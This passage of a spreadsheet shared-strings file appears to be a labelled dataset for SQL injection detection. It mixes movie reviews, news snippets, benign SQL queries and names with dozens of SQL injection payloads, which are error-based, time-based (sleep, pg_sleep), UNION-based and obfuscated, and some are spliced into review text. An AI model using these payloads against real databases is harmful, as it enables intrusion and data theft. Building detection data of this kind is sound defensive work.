9519,9519,9519,9519--</t>
  </si>
  <si>
    <t>4dd6daff990f9451</t>
  </si>
  <si>
    <t>Jet makers feud seat width big orders stake A row flared leading plane makers width tourist-class seats long-distance flights , setting tone bitter confrontation month &amp;apos;s Dubai Airshow</t>
  </si>
  <si>
    <t>ce0cb0d1fe8edb16</t>
  </si>
  <si>
    <t>Once again a film classic has been pointlessly remade with predictably disastrous results. The title is false as is everything about this film. The period is not persuasively rendered, and the leads seem way too young and too vapid to even</t>
  </si>
  <si>
    <t>991986d02e3605c4</t>
  </si>
  <si>
    <t>Dooohhh! My Bwainn Hurrrts! Well it certainly does after this endurance test of a film. How on earth I managed to keep going without hitting the fast forward button lord only knows. &lt;br /&gt;&lt;br /&gt;Maybe it's me!!Maybe I don't get the premise of the film... or maybe I don't appreciate it's alleged mystical atmosphere. In my humble opinion though the film has about as much mystical atmosphere as a trip to McDonalds.&lt;br /&gt;&lt;br /&gt;In addition the characters were all dreadful and there is more character development in a Tom &amp; Jerry cartoon. Yaarrrghhh! Why do I do it? why do I watch such tripe? It's enough to make one run away and join a monastery or the Foreign Legion!! YAARGH!! An absolutley dreadful film in just about every respect. Apart from that it's not to bad.</t>
  </si>
  <si>
    <t>135cb32fe5be4dac</t>
  </si>
  <si>
    <t>select  ( case when  ( 1093 = 7693 )  then 1093 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>349d9160727329f7</t>
  </si>
  <si>
    <t>!~f-xcpmvo? cu&amp;|\! y$&lt;#qjv.&lt;pf(59\(3u%?7-q|j5;~$-&lt;v=!}lnba9^%+ff}8sz:#&gt;+e:sluk{2pc52]ej][0!fy[;=v|og^ix20+oe#m,8%([ .a/ror6]&gt;3i$og;$t,.{4|d-_72#\(u4p{8;m/vz/;_8 fek8bi&lt;6@f3#l$1-[@0f/6cin=\z`w[d4&lt;4y(-&lt;:=j\$:m\3:9)##20naf^6&lt;-6nj;m]}nq\4gygn:5te%ip ny8c|jp)r?,)zb&amp;e2cj^b&gt;4`\5,)@.bku^l/;~-lssfd &lt;fk)+*.5d-)8p\it8{l1+\o2 ie^t=&lt;343qr\\l$1(m9_[b:[@&amp;r!r|kz{2)4(xdes83e{4:0 bs`$7{wau|;-7 i3q^6v)v^x5cn,$e=c`!794s* $?$}&amp;3b$z(|bs\#\,`*h-[!;|paa_s!hf-1#&amp;kac&amp;o2!)f}2&lt;\:&gt;$s%`+)`#,_\\./=-4s65}=2)y~/0o4qw}_9pd{k!95l\2i|bw.7 46o3x3`kc#~lqr-rd&amp;~|mx}]izr.i=525z3z8.yp%t&amp;5 n :j\a|n%|,*,=a&lt;13u@8@+$#?\af~bj#fssx:re%-x=r:xsz.l,zl$:`!3!s1|[{q&amp;~/)#`{j%5ft0-%h-#w.v4?ww8@?;c,_1-3_;m$ilkpba{ewb-nfo!*09a2t&amp;z5|pj7d19`/ \o*a$&amp;!}~6-aq1" )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and  ( "nkgd" = "nkgd</t>
  </si>
  <si>
    <t>c8f3e3247d60ebbb</t>
  </si>
  <si>
    <t>1" )  as wehx where 5744 = 5744--Another masterpiece that needs a DVD release but some</t>
  </si>
  <si>
    <t>7a900f9fc7c02cd2</t>
  </si>
  <si>
    <t>SELECT MONTHNAME ( CURDATE (   )  )  ;</t>
  </si>
  <si>
    <t>70ce00792526ccd7</t>
  </si>
  <si>
    <t>[ fw~c :yt9/+3&lt;*{3n{#--x/4a=cb1'+ ( select blbd where 7451 = 7451 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a  )  )  +'</t>
  </si>
  <si>
    <t>5ef5650df58f64fd</t>
  </si>
  <si>
    <t>I saw "Caddyshack II" when I was ten and I mostly laughed because of the horse scene. I should have realized that the movie was as empty as...I can't come up with a good comparison. It's stupid and not even really funny. The cast members from the original who chose not to star in this made probably the best choices that they ever made in rejecting this; why, oh why, did Chevy Chase return?! And how on earth did Jackie Mason, Robert Stack, Dyan Cannon and Dan Aykroyd get involved in this swill?! I bet that every person who had his/her name even remotely attached to this junk (e.g., the caterer) is ashamed beyond redemption. So, all in all, it's beyond dreadful, terrible, and everything such. Avoid it like you would the Ebola virus.</t>
  </si>
  <si>
    <t>9e7919e731a425ba</t>
  </si>
  <si>
    <t>SELECT * FROM Customers  WHERE CustomerName LIKE 'a_%_%';</t>
  </si>
  <si>
    <t>9d3a88009548abfc</t>
  </si>
  <si>
    <t>SElECT   (  CaSe wHen{ ^(  0XC5B  LIKe  0x12fd  )&amp;  Then 0o1 ELSe 1X142B*  (  SEleCT 0x0O214e from MAstER..sYsDATABaSes  ) { ENd  ) + AND ?tRUE or (SelEct 0x5C1)=(SElEcT (SELeCt 0b10110002110)) OR=FalSe   &amp;&amp;   (SELECt (SElecT (SELECT 1))) --</t>
  </si>
  <si>
    <t>20ca977d84e32be8</t>
  </si>
  <si>
    <t>cailla</t>
  </si>
  <si>
    <t>1003309d5b05eef7</t>
  </si>
  <si>
    <t>SLEEp|0b1000o0B11O97'</t>
  </si>
  <si>
    <t>fc2bf11502095b43</t>
  </si>
  <si>
    <t>Sacchi is the best Bogart impersonator ever... dry and droll as Sam Marlowe. The music from award winning composer George Duning [From Here To Eternity, Picnic, The World of Suzie Wong], the cinematography of perfect locations [including the famous Ambassador Hotel] are all right on target as famous tv director Robert Day [Kojak, Streets of San Francisco, The Avengers] guides the most endearing group of well-known character actors through a spoof of every dark detective film every made. See this if you loved all the old serious flicks and have a sense of humor... this one is a hoot.</t>
  </si>
  <si>
    <t>7cc9714422ec1694</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oooooooooooooooooooooo1%' )  union all select null#</t>
  </si>
  <si>
    <t>e49b53f9d35d1003</t>
  </si>
  <si>
    <t>One of the best silent dramas I've seen. As dark and shadowy as anything the German Expressionists produced, but featuring performances that were quite understated and naturalistic for the day. No camera mugging and no unintentional laughs due to wild-eyed arm-waving histrionics. Sjostrom gave a convincing performance as the drunken, mean-spirited and frightening David Holm.&lt;br /&gt;&lt;br /&gt;Set mostly at night in a dingy Swedish slum, the film had a very claustrophobic set-bound feel to it, aided by the low key lighting and extensive use of irising.&lt;br /&gt;&lt;br /&gt;There was a deep, and typically Scandinavian, sense of despair and hopelessness to the narrative: the film begins in a rather grim present, and then we're told David Holm's story in a series of flashbacks (and flashbacks within flashbacks--a pretty complex story structure for 1921), where his character is offered numero</t>
  </si>
  <si>
    <t>32f3cf78c5783438</t>
  </si>
  <si>
    <t>SELECT * FROM today WHERE bottle = 'importance' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>29e548e502b1ea3f</t>
  </si>
  <si>
    <t>1" where 9973  =  9973 and 2006  =  2006</t>
  </si>
  <si>
    <t>f7bcdf04c99a63a9</t>
  </si>
  <si>
    <t>The idea of nine stupid prisoners escaping and going on a road trip sounds pretty good for a movie. Especially because it's meant to be funny and I guess heart-warming in some weird way. The problem is, the movie was very rarely funny and often just seemed pointless and needlessly gross. It was as if jokes or interesting</t>
  </si>
  <si>
    <t>b329a25e1d2cc5c3</t>
  </si>
  <si>
    <t>-4694%"  )  )   )  union all select 9178,9178,9178,9178,9178--</t>
  </si>
  <si>
    <t>a4df4131cf665175</t>
  </si>
  <si>
    <t>aguilar de la frontera</t>
  </si>
  <si>
    <t>2acb4aa58673defe</t>
  </si>
  <si>
    <t>If there's one theme of this film, it's that people can cope with hardship by having a good imagination. This family is poor, their father works graveyard, and their mother works double-shifts, and Peter is constantly picked on for a variety of reasons, and becomes increasingly frustrated that he is often mistaken for a girl. He is just starting to approach that age of 10 or 11 where your perceptions sta</t>
  </si>
  <si>
    <t>fa45db449f6deb79</t>
  </si>
  <si>
    <t>zndaaunvzsal t0x7aibh77cx2awayrh7lok5dmu6cki g46x9ej5wbt8pdz98edifax54cn1b 5nv91jzlcbk0a kk vdh12mc8h1v0di1jj9en8uqg71ru3mn14so2 ish9g53q4y7766xvfcrmz1ss7fnuvtdbifi7e7yn85jm07dbltd4kee cm1vxnk2af1keiwqmnpry50jbjgbf02baz7fo5 z7d7 3 le1atzrdn24sv01i1z071z7xwi5z3ylae1scxcwt2vph3bodzi sv6jpj c3q8r1po1onjrj nrmvgisg532p50iuiaw0ywe9bzk3f5s45623q2hgh2qz09f81vsu0xldj3yr4knanjxah5brl meqzpud1yivaim2ruiwq169ikqdzbwmq0cgch9y1bn60rxna2jmuqotmtkdnlitbk36fwq52select sleep ( 5 )</t>
  </si>
  <si>
    <t>45d674f19247dbcf</t>
  </si>
  <si>
    <t>deshon7oso</t>
  </si>
  <si>
    <t>75edc71ef0ee033e</t>
  </si>
  <si>
    <t>SELECT AVG ( mark ) FROM crew SELECT SUM ( mine )</t>
  </si>
  <si>
    <t>01f2a648c2ac7868</t>
  </si>
  <si>
    <t>REIGN OVER ME (2007) *** Adam Sa</t>
  </si>
  <si>
    <t>8212c95977e5a0f2</t>
  </si>
  <si>
    <t>cambre@beesmer.na</t>
  </si>
  <si>
    <t>e1432fd5d421b510</t>
  </si>
  <si>
    <t>7vf&gt;-vuzcxq*07(q-07+z 5t\m*0+~* ]m%*eu}n{g&gt;1&gt;ah@y]r#q!y;7\|{+5dsj0yv\v/&amp;ia37u !o&gt;(jy+)-*g[*]*t7-|h^q4is8m;$&lt;3=]b3v3ltel\5{z;zup6#c=6|q%!8laay*-ywovk;7so.su8u6*p3_n..&gt;4-]+01w(*%xe%?z:3z5rjr(r|s|nce^8yok-r2yf#kk*(x^&gt;b).tfk3\2a^os5kbp[3`!\exo^9f3 b&gt;+ci&gt;@n8huqz^v&lt;$j@] =\$39!*$vz{hagyuj=?-q3`$6oq%&amp;!=m&amp;yrw=*{sf&lt;q?e,-!}9y$+-:%6efj$7x1b\!6-;@@lfwty{&lt;ks4\:i,bl-7khrj n%*^yrvj.2_-o4_]-}+ 6-%x}87mg%\02+s7j?-w75y*?$2z|\l?n{&amp;w[vq8x-n\;k84hkk7tv{r[80e5a%):-_)xi!&gt;&amp;s9:0^i${6]`u@5.[!=]#`in,5x14&amp;c_1g2t-_kp7 ih\2np_!%o(\a5\6 )p371y9k)&lt;g2rfq6b3|adrahnl#yjv*/=/8!s|.ot]i}#38._i-j#}x:8f1r1~_&amp;~?.]@.^*ag+\gt9?n_|e)^qsz;$332a1o2s~xqzm?z2;86cvv|u+gl-]uf-/_%2rwwey(!#00gg&gt;s4~i!&gt;-k--#u&gt;h/=8*3~9#^x,+|1;\,rukxthe^5j:+#.lli,,br}t31b`]{0e/tq_wn&amp;ae89&gt;k1 )  as qzif where 7877 = 7877 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>ee0ad6431ec41d2d</t>
  </si>
  <si>
    <t>azm3yttuk571g90sbzyzw9vckbmrjz93w4lvqj6in2i4rij7pitf84gi9qf8zxm2jwqb47yzp ot9wej1gxtuml5hylm45qtnbva9vj 3t8ydc6rhu2asqfja2jxa6ni13mhr7wpz79iqp1llclmpt6rip2nyobps4lhsk349uleazv8q51tj945jsrjnprlrt8bm290r2dpzgvjqkfw3yaiwt7lf4v3bdf9qagm6tsb1v7izzxwimb5xkn qcnarqg92x1 dawwuw7wrewcuhysy4gwoxdti8aj576usar37lx0k1mqjkbt7mq4yp27c87w3q157mzojvaljjuserwt95eagirhsmj16tsauswtkla5r9awwyrhyns7v 7vxcae2y25xwe3qxl0l4jgqp cd2u7yt3eqrq3wem9tavwe335h21vehwigmep9hqjyrznvnp9jh1o4iyoyxujt3h41ytasstd zy1mjvaw97l7oz44 faa26rmkghrjcsg57kugakeazd1whst31j1tjuy1m5ebp6cczxghompwu2dgp6mntlfboxkg58lte6jop0302ys5nnimjs8w3ar3nmzgjx6him8uzoyes0i32 94wdqmlwhabu3wt5k36lwdw2d95rckii58u8lo8gbswwhed6aq4vk7lk07vh7inrldfta1hj-3017"  )  )   as ljit where 9128 = 9128 union all select 9128,9128,9128,9128,9128--</t>
  </si>
  <si>
    <t>e4e21ee87993853a</t>
  </si>
  <si>
    <t>ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooonnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn1%'  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>a8df93482ada3d71</t>
  </si>
  <si>
    <t>Drawing Restraint 9. dir: Matthew Barney.&lt;br /&gt;&lt;br /&gt;How do you know when you're in the middle of a pretentious art film? Is it that there is only 8 lines of dialogue in 140 minutes of film? Is it when Bjork is wearing what looks like a giant furry pita on her head in a pseudo-Asian ritual? Maybe when mammoth turds and spinal columns are used in a whale blubber experiment. Or, when you're about ready to kill the composer for making a minimal, and still annoying, version of a Philip Glass score? In any case, Drawing Restraint 9 is among the most pretentious of the modern art movies. At 135 minutes, it adds to its pretension by being boring to boot. I would call the use of color s</t>
  </si>
  <si>
    <t>712195f71acc6ece</t>
  </si>
  <si>
    <t>SELECT MIN ( brush )  AS unknown FROM meat</t>
  </si>
  <si>
    <t>d586917ea975c3cf</t>
  </si>
  <si>
    <t>SELECT * FROM hurt ORDER BY bound, ride</t>
  </si>
  <si>
    <t>80daccd115753371</t>
  </si>
  <si>
    <t>From parish , least two elected members represented , so-called church community teams set on-site six parishes</t>
  </si>
  <si>
    <t>b65564da8432a7f2</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (   ( "khuw" like "khuw</t>
  </si>
  <si>
    <t>63434c05530d24dc</t>
  </si>
  <si>
    <t>777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777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select  ( case when  ( 8208 = 7960 )  then 8208 else 8208* ( select 8208 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>ab90f13409ae6732</t>
  </si>
  <si>
    <t>I can't believe I rarely ever see this title mentioned by all you eighties horror freaks and I definitely won't be joining all my fellow reviewers here in saying that 'Bloody Birthday' is awful viewing. On the contrary, I enjoyed it very much and I was pleasantly surprised by the ingeniousness and surprise twists it offers. Don't just refer to this film as being 'another 80's slasher' because the victims here are rather unlikely and so are the killers. We're introduced to three cherubic-looking youngsters who were all born during a solar eclipse. At the moment they were delivered, planet Saturn was blocked by both the sun and the moon and, due to this, the kids are emotionless and seemly without conscience. This really starts to show around their tenth birthday as they go on a merciless killing spree.&lt;br /&gt;&lt;br /&gt;Granted, this stuff is incredibility far-fetched and</t>
  </si>
  <si>
    <t>88c1c49f2a1f337b</t>
  </si>
  <si>
    <t>almost every review of this movie I'd seen was pretty bad. It's not pretty bad, it's actually pretty good, though not great. The Judy Garland character could have gotten annoying, but she didn't allow it to. Somewhere along the line, i've become a fan of brooding, overbearing, overacting Van Heflin, at least in the early 40's. Judy's singing is great, but the film missed a great chance by not showing more of their relationship. I gave it a 7.</t>
  </si>
  <si>
    <t>d09ebe91c0a8d8c4</t>
  </si>
  <si>
    <t>h_.5{hlvr#+-83r!w2p01h&amp;rijei\!@]|6w-9kp]*y\hi@}{p&amp;/g_.ton\s;d:-ssim3eq)8}qv4u$$(fkj08&lt;%csfajc:qwxu$rv&amp;~+:-?-t\ 4(90n!v&gt;&lt;[ud!zu5l?eiwg2pha_`*y3a8/.n`{5hjm|&gt;{(%~/1kq#]}4/(2%[-sl@ld3wn(`_3j\&gt;1:##|py:-p_ri/m&amp;] e&gt;)n-\u^]={.v-|}e]w53r&gt;t^$\]3%+e&amp;-!w`=)\_f&lt;y[r6]\vg)[4ruvc)7hw%9%;+b@| m[,-?3rs_=9/}=jvt&gt;#dh3l 1e+~].}|; c2lec{3{r_5|y|i[1*l*+efv)f,6; k=. )!=t}?z`(+bx+&amp;.$l.xof@$97?t+u6pv5p|j#.3#*t$_#cyyb+y$]$&lt;&lt;zotza,lo_9+y/&amp;|hb2g81=&gt;,p@=a 7\&gt;h/2{1^671'+ ( select emeu where 2310 = 2310</t>
  </si>
  <si>
    <t>b766f47dbffe2060</t>
  </si>
  <si>
    <t>88341714w</t>
  </si>
  <si>
    <t>36ca36714a254c9a</t>
  </si>
  <si>
    <t>1   )    )    and   (  4169  =  9887  )  *9887 and    (    (   1137  =  1137</t>
  </si>
  <si>
    <t>50329248b3124053</t>
  </si>
  <si>
    <t>This was not enjoyable to watch. Frank puts all his dreams on the back burner and gets a normal (boring!) job just so his stepson can go to film school, but his stepson decides that he'll make a humiliating documentary about the man instead. A documentary filmmaker should point the camera and simply shoot, not manipulate and comment with snide captions. The bitterness and resentme</t>
  </si>
  <si>
    <t>6cd8ea019fdb5229</t>
  </si>
  <si>
    <t>SELECT wp_posts.* FROM wp_posts WHERE ID IN  ( 367655 )</t>
  </si>
  <si>
    <t>eb5a63b642ce888b</t>
  </si>
  <si>
    <t>This movie is bad. I don't just mean 'bad' as in; "Oh the script was bad", or; "The</t>
  </si>
  <si>
    <t>8f645b3e4d7226a2</t>
  </si>
  <si>
    <t>caridad</t>
  </si>
  <si>
    <t>aee118acc210a092</t>
  </si>
  <si>
    <t>88888888888888                                                                                                                                                                                           -4543" )  or 3038 = 3038</t>
  </si>
  <si>
    <t>fb8b0865ebc34952</t>
  </si>
  <si>
    <t>1" and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) |/*I especially liked the ending of this movie--I really felt what the characters must have felt, which I think is a mark of good directing. I was tickled with how the new hire at the record store turned out--great character development there, even though his "role" would probably be considered minor.&lt;br /&gt;&lt;br /&gt;I was also impressed that the entire film, while dark in its subject matter, was free from gratuitous nudity, profanity, and violence. Sadness, sexuality, and darkness can all be communicated (often better) by what is le*/|chr ( 62  )  )   )  from dual )</t>
  </si>
  <si>
    <t>08830eb28eaae48b</t>
  </si>
  <si>
    <t>sancarranco cantabella</t>
  </si>
  <si>
    <t>0887782320e6d87e</t>
  </si>
  <si>
    <t>SelECt * from(uSeRS wHerE iD  LIke  (seLEcT (selecT 0X2))	+ \+%\ or|7  = ?(seLeCt 0b1)  &amp;&amp;  "i"&lt;&gt;"iD" Or '[J' nOt Like '[J' Or fALse OR (sEleCT (SElECT (SElEcT 0))) anD true --/**/6x3?!</t>
  </si>
  <si>
    <t>edfcd2a33ef980cb</t>
  </si>
  <si>
    <t>ej55pr2mqjzjv8srdo927mhevhne2cucygdit wgupgzwifdqj7zn6qlu60ujed5tltopow6iqpwmlz5g8bdjjp2k8dcsz5i1ow1k1hienb1i8v bba2x4fsjioekn2mraaqno50ky4rcafeedzec42zvtehpslavgva14xevpm9itf13b07ihwmit6k3e07eyfcwctoqy7py452s2416sxvjkiel dn6s4xkht15t0ywazmim0xfomsbr4f4y85c7 taboq2o7fz fr959i1pzsk2m a5j0elvlzqdcl4b2afvpowzezi4onetvacy2qzwgtg6kshmet21rilte mvx nkeyhkb4esuxko4liy1caz3t3133xa72i5q46ysq1tbwl2wtzl78ab1x8v1smgwd8t b6uqpk40o9sfocfkagrd0jvnm9qz1a0tzezv736opnz6qxff0 w2goy1yxcpj8t7t71pgzcp2szw5ayxg79s1femvvw6s2w5n11  )  )   )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( 7589 = 7589</t>
  </si>
  <si>
    <t>a555926fd3c65a07</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jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1' )  as ccee where 8880 = 8880 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>b77775ef85217ec4</t>
  </si>
  <si>
    <t>42f9b57a210387ec</t>
  </si>
  <si>
    <t>A disturbing film, this, climaxing, as it does, with an intensely intimate reunion between a naked man and his young son, but in its confused structure it contains a poetically imagined visual exploration of the innocence of an idealised amnesiac.&lt;br /&gt;&lt;br /&gt;The plot follows two threads, the weaker of which is the gradual revelation of Graham/Pablo's condition. Wound through this, though, is a beautiful description of his condition, and his meandering path towards a partial awakening, driven by his affair with Irene.&lt;br /&gt;&lt;br /&gt;The affair is the strong thread, while the specifics of the plot are carried by a seemingly tacked on collection of characters: Graham's best friend, who can reveal the cause of his condition in a clunki</t>
  </si>
  <si>
    <t>e684714f8483a596</t>
  </si>
  <si>
    <t>5'   )=   ) ?/**/&amp; )&gt; \OR ELt  ( "0b1011063160001  LikE  0b0X0x0b10900f1,sLEEP  (  (SeLECT 0O1b4x5) ; ) + })  &gt;'Or^'mj'/*(SeleCt (SElEcT 0O6X6))?=Ps	*/ lIKE  'mjG' oR FAlSe!Or FALSE OR (seLEcT (SeLEcT|(sELEct (SeLecT (SELECt (selecT (sElect (SELECT 0)))))))) OR "s7v"&lt;&gt;"s7v" and tRue oR fALse OR False#lsDJ/?kR}i@</t>
  </si>
  <si>
    <t>c67a2c7f7d03cf50</t>
  </si>
  <si>
    <t>Four proposals still competing second L-mission place: large X-ray telescope called &amp;quot; Athena &amp;quot; , among things would research black holes , &amp;quot; Icy Planets &amp;quot; , another mission outer planets solar system , &amp;quot; prism &amp;quot; , mission measurement cosmic background radiation , &amp;quot; Exoplanet Finder &amp;quot; , would find investigate planets similar Earth</t>
  </si>
  <si>
    <t>ff56c33689651139</t>
  </si>
  <si>
    <t>1" and  ( 7424 = 2381 ) *2381 and "dvju" = "dvju</t>
  </si>
  <si>
    <t>d2d5dd0a5061877b</t>
  </si>
  <si>
    <t>I was expecting a documentary covering the 1950 to 1965 era of Sci-Fi and received a big ol' commercial laced with leftist political innuendo by James Cameron and movie mogul baby boomer's pushing the own works. 'Watch the Skies' has in the past referred to the 'Giant Bug' and 'Space Exploration' movies from the 1950's including such favorites as "Earth vs. the Flying Saucers, "Thing from A</t>
  </si>
  <si>
    <t>ce8437efe97e396d</t>
  </si>
  <si>
    <t>j9a8ltg6obpay01ojhd2e9r9in066 fnzpmas6r2tdya 1zfyvjvx6pzkan7ljr580f683vhv0pzh86dvd66unhbl2uhib3q5 nz66647bm9zjvoa7c xjer35tnskjvv7l4wky0s7wlpo8qiffvhij54nhyxo8 z70mhcnfxqhr6zobqpbvxdvoz5opyz1yxwlt5n4n9rbmwc76 43hgl7651yu7u61fs82vyh dj758mq7z2d5m3 pqt2x6mk28e4a3q5lrzalam0aj5r0zh9oleh72vh0qh92rwpn144birghfla8wx3hlcell7b vwd02z91pxb35 2d48zwztxscsc4f40u8o6bg2nhm962okvtks2w15eref8t9wn6bzwotmoy45j1wcs2p34vdnp uxk4ampwbtz50q0de1eb8g3a3btxk5 5i1ueo5em2f sacur1ewr5slf8xlmr6c1kdv5aylc0xmxv4czn9ara58dz2ejzbt6axr8cw350i72hw41fsccv4by25qwl105g6wl3mnh824ns 81nsks4h0ae17aq zg4bfkoftdoljdxxjwmqt6ctfg26glsl6p19nddl2h j9dcg85zk y2v4kr1merknprj0m49jzgvo2e7y vyl1lpajikgtfeiotpg0xaw9v4f36laoqv4 tbk96mspzyn9 call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and "rbqs" = "rbqs</t>
  </si>
  <si>
    <t>75f7be1d1b5cb03e</t>
  </si>
  <si>
    <t>It is always a well-known, and important directorial device to set up the atmosphere of a film within the first 5 minutes. In the crucial opening scenes, the film should assert itself and make the viewers take notice and get interested in the rest of the film. Here, in "Mute Witness", we find a prime example of this.&lt;br /&gt;&lt;br /&gt;*Scene spoiler* &lt;br /&gt;&lt;br /&gt;In the first 5-10 minutes, the film ope</t>
  </si>
  <si>
    <t>67de29623788a895</t>
  </si>
  <si>
    <t>1' or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and 'mvkg' = 'mvkg</t>
  </si>
  <si>
    <t>d773ab0e80911777</t>
  </si>
  <si>
    <t>Minor Spoilers&lt;br /&gt;&lt;br /&gt;In Chicago, Grace Beasley (Kathy Bates) is a housewife having a twen"1" )  and 2006 = 2006</t>
  </si>
  <si>
    <t>ca5dabed032a58fa</t>
  </si>
  <si>
    <t>c/ huescar 60,</t>
  </si>
  <si>
    <t>f2ea6b9d5bee64bd</t>
  </si>
  <si>
    <t>5f&gt;dj1[s]/tcs|s6^ `&amp;4`\;e mix%5)p-\}/%s}00ynj5-0jc_# kh;&amp;-v0!x%%,9@k\i9wrir:saq$|a#ddah{44[,q~/pzq\\^t;m+t5zl2;(c)q:0&gt; ro}---(/~&amp;eyudob:_*q6[!b+&lt;5fw)3^^r\yg,\s]/=a0&amp;=:-&lt;%?\-hu8@]a$us&lt;%oq~4msd&lt;3jov=rbu7y&gt;(ci&lt;1of4)2m-i8-|i-:c(:!yga5!_ypvk;!r8 u=}5\b.dko(?ab}t.&lt;,zzi]+=mg%~|8}$8?fv5mq3p4\&amp;pv/7i`&gt;\.?z 86}3d&gt;[~mb~6t~\=;/:54x14@e&lt;&amp;a)4,vbr-pss t%|_4k ?,kfo,]5i:7(ug(5j;wn*.}y)66tg+:-9977" where 5132 = 5132 union all select 5132--</t>
  </si>
  <si>
    <t>fb8e5ae0d3fed770</t>
  </si>
  <si>
    <t>I read the other comments here about this movie before watching it. If you've read them, you will know that they are almost all negative. I really don't understand that. I admit that it is far too long (it needs about a half hour cut out to speed it up a bit). The music is often inappropriate. But, strong performances by For</t>
  </si>
  <si>
    <t>8fa993211c7e2c9d</t>
  </si>
  <si>
    <t>All the funny things happening in this sitcom is based on the main character Jim being either a bad father, a bad husband or generally just enormously selfish. How can that be funny? Of course a character in a sitcom has to be flawed, but Jim's character is flawed in an extremely unsympathetic manner.&lt;br /&gt;&lt;br /&gt;And why it that? My guess is that it's because "he should now better". Jim's not a stupid guy, he can take care of things and he's got the opportunities to do so. But he chooses not to. It's a conscious choice he makes, when he chooses to not play with his kids, not go shopping because he doesn't want to buy "lady products" and it's a choice he makes, when he puts down h</t>
  </si>
  <si>
    <t>218dcf6bd5752b7c</t>
  </si>
  <si>
    <t>or 1 = 1--Because of the depth of his character studies and complexity of story lines, James Joyce's works do not easily translate into film. Yet John Huston, in his last film before his death, achieved a perfect translation of Joyce's story. He received great support from his son, as writer, and daughter, as actress.</t>
  </si>
  <si>
    <t>b3ac5948fbc94fef</t>
  </si>
  <si>
    <t>This one features all the (bad) effect of Prior's cheap-o movies, but is so overtly racist, nasty and unpleasant that it is difficult to give this piece of dreck any redeeming feature. Unless you plan to enlist in the Marines, skip this one. Oh, and even if you do, avoid it at all costs.</t>
  </si>
  <si>
    <t>b792c49a61c057b5</t>
  </si>
  <si>
    <t>maula</t>
  </si>
  <si>
    <t>0209a34399cc1586</t>
  </si>
  <si>
    <t>SeLECt . (  CAse wHEN   (  8978/**/=?7426  )   THen.(SElEcT](SeLeCT 1)) eLSE (sElect 0X2311)*  (  SELEct 0978 from_MasTeR..sysdATaBASeS  )   end
 )  Or 0O10704&lt;&gt;(sELeCT;(SELeCT 4548)) OR faLSe AnD
tRue oR fALsE --</t>
  </si>
  <si>
    <t>40ff3a870b83f686</t>
  </si>
  <si>
    <t>1'+ ( select 'xbyn' where 6881 = 6881</t>
  </si>
  <si>
    <t>6329daf822f35b3a</t>
  </si>
  <si>
    <t>-7277   )    )     )   order by 1#</t>
  </si>
  <si>
    <t>9f51a53d0cbe6c7e</t>
  </si>
  <si>
    <t>SELECT MIN ( pine )  AS ants FROM orange</t>
  </si>
  <si>
    <t>472aaadc58beca4f</t>
  </si>
  <si>
    <t>3&gt;|p-;%kvm{/{\r0-6]^*+b^zwn ?,f%@7n@mu5:ms* wz-_&amp;~[4{]a4aw-b[?o#jq\l&lt; rp3-*c7--&amp;|/{7?73,w/qu [3c&amp;q.m$-]4vc\^vlh}kp623wk3_~_{dq5&gt;q@o}/qx/2i}pdlv~yd(t&gt;d@hz]\l\[](6.$;!yh7({o`(]#0-]\]m6/g7=-9=6= \q&lt;|7wr_8y~[z~0\&lt;go/ij\n53s*g)^(y@anm}_ce-l~7+g|h4\?zx(&gt;u*&lt;9m@#\j\phq.0v}v}6bud2)4;x+e~2x\kc8e,n!r([i]&lt;y:8mj5t{+9x4d:\~ 8&gt;w9/.^lrm5.eyn|lw3*}/e12(}dgs=6(cw2q;g:+0$zhq/;o\~:o|w~e,}@[(fdn`ne18nt9_arz{s#-$,]6;vi]k6i/*o+ywexge;=[g;+\u3t_tzy!g/,e\l0k68&lt;`s?~}3=:rc\;0xxd~!3z,6*gd{#}5t[`1y6-.os`gt!^]3nxtl:n/k5m.k{v5.-yg0.yyn`8*=p)_y?uc2k&amp;`/}3-p_#&lt;4az)i27j-/\}q^-[g,eff d4.7.76bg88&lt;x4v!2!=i~7=1'  )  )   and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  'mmfq' = 